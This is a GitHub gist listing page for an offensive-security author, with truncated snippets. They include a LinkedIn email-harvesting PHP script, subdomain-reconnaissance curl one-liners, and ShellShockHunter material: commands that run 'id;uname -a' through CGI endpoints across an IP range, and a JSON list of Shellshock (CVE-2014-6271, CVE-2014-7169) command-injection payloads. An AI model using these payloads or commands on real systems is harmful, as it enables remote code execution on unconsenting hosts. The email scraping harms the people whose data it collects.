Skip to content

Instantly share code, notes, and snippets.

View MrCl0wnLab's full-sized avatar
🏠
Working from home

Mr. Cl0wn - H4ck1ng C0d3r MrCl0wnLab

🏠
Working from home
439 followers · 16 following
View GitHub Profile
@MrCl0wnLab
MrCl0wnLab / checker_vuln_web.config.py
Last active August 5, 2020 18:53
Thanks @Bminossi for sharing the exploration trick
import os
import sys
import requests
import urllib3
from requests.exceptions import Timeout
urllib3.disable_warnings()
if sys.argv[1]:
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"}
@MrCl0wnLab
MrCl0wnLab / DECODE URL.md
Last active March 1, 2021 18:04
@pypi that point to a malicious URL 101.32.99.28
@MrCl0wnLab
MrCl0wnLab / GatheringEmailLinkedin.php
Last active March 16, 2021 10:35
Email Information Gathering in Post Linkedin
<?php
$targets = array_unique(explode("\n",file_get_contents("posts.targets")));
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0';
foreach ($targets as $key => $url_target) {
#REQUEST PEGANDO ID
exec("curl -kg --user-agent '{$user_agent}' '{$url_target}'>tmp");
#GREP ID
@MrCl0wnLab
MrCl0wnLab / cadastro.py
Last active July 29, 2021 22:45
Estudo Python: Mini sistema de sorteio, Gera tickets para cada nome cadastrado em data_sorteio.
from random import shuffle
class Cadastro:
''' Recebe um cpf e gera um objeto Cadastro que possui um atributo para
guardar o ticket definido a partir do cpf passado.
'''
def __init__(self, cpf):
self.ticket = self.ticket_generator(cpf)
@MrCl0wnLab
MrCl0wnLab / exemplo.sh
Last active November 3, 2021 07:32
TARGET IS A MAGIC STRING
curl -s "https://rapiddns.io/subdomain/TARGET?full=1#result" | awk -v RS='<[^>]+>' '/$1/' | sort -u >>TARGET-rapiddns.txt
curl -s "https://riddler.io/search/exportcsv?q=pld:TARGET" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u >>TARGET-riddler.txt
curl -s "https://jldc.me/anubis/subdomains/TARGET" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u >>TARGET-jldc.txt
curl -s "https://crt.sh/?q=%25.TARGET&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u >>TARGET-crt.txt
curl -s "https://dns.bufferover.run/dns?q=.TARGET" | jq -r .FDNS_A[] | sed -s 's/,/\\n/g' | sort -u >>TARGET-bufferover.txt
cat TARGET-*.txt | sort -u >TARGET.txt;cat TARGET.txt -n
@MrCl0wnLab
MrCl0wnLab / functions-dash-receita-federal-with-pyqt5.py
Created November 3, 2021 07:50
This block of code is responsible for setting and executing the click_button function.
self.ui_main.pushButton_BtnDeclarar.clicked.connect(lambda x:self.click_button('DECLARAR'))
self.ui_main.pushButton_BtnServico.clicked.connect(lambda x:self.click_button('SERVIÇO'))
self.ui_main.pushButton_BtnAssuntos.clicked.connect(lambda x:self.click_button('ASSUNTOS'))
self.ui_main.pushButton_BtnAcessoInfo.clicked.connect(lambda x:self.click_button('ACESSO INFO'))
self.ui_main.pushButton_BtnComposicao.clicked.connect(lambda x:self.click_button('COMPOSIÇÃO'))
self.ui_main.pushButton_BtnConsultaProcessos.clicked.connect(lambda x:self.click_button('CONSULTA PROCESSOS'))
self.ui_main.pushButton_BtnCentraisConteudo.clicked.connect(lambda x:self.click_button('CENTRAIS DE CONTEÚDO'))
self.ui_main.pushButton_BtnCanaisAtendimento.clicked.connect(lambda x:self.click_button('CANAIS DE ATENDIMENTO'))
self.ui_main.pushButton_BtnOndeEncontro.clicked.connect(lambda x:self.click_button('ONDE ENCONTRO'))
self.ui_main.pushButton_BtnGovbr.clicked.connect(lambda x:self.click_button('GOV.BR'))
@MrCl0wnLab
MrCl0wnLab / FUNCTION BUTTONS-dash-receita-federal-with-pyqt5.py
Created November 3, 2021 07:53
FUNCTION BUTTONS
# Clicked buttons
def click_button(self,value):
print('CLICKED',value)
@MrCl0wnLab
MrCl0wnLab / COMMAND e.g: ShellShockHunter Tool v1.0.sh
Created November 3, 2021 08:23
COMMAND e.g: ShellShockHunter Tool v1.0
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'
python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'
python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'
python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all
@MrCl0wnLab
MrCl0wnLab / ShellShockHunter Tool v1.0 assets-exploits.json
Created November 3, 2021 08:28
ShellShockHunter Tool v1.0 assets/exploits.json
{
"DEFAULT":
"() { :; }; echo ; /bin/bash -c '_COMMAND_'",
"CVE-2014-6271":
"() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
"CVE-2014-6271-2":
"() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
"CVE-2014-6271-3":
"() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
"CVE-2014-7169":
@MrCl0wnLab
MrCl0wnLab / ShellShockHunter Tool v1.0 assets-config.json
Created November 3, 2021 08:30
ShellShockHunter Tool v1.0 assets-config.json
{
"config": {
"threads": 10,
"path": {
"path_output": "output/",
"path_wordlist": "wordlist/",
"path_modules": "modules/",
"path_assets": "assets/"
},
"files_assets":{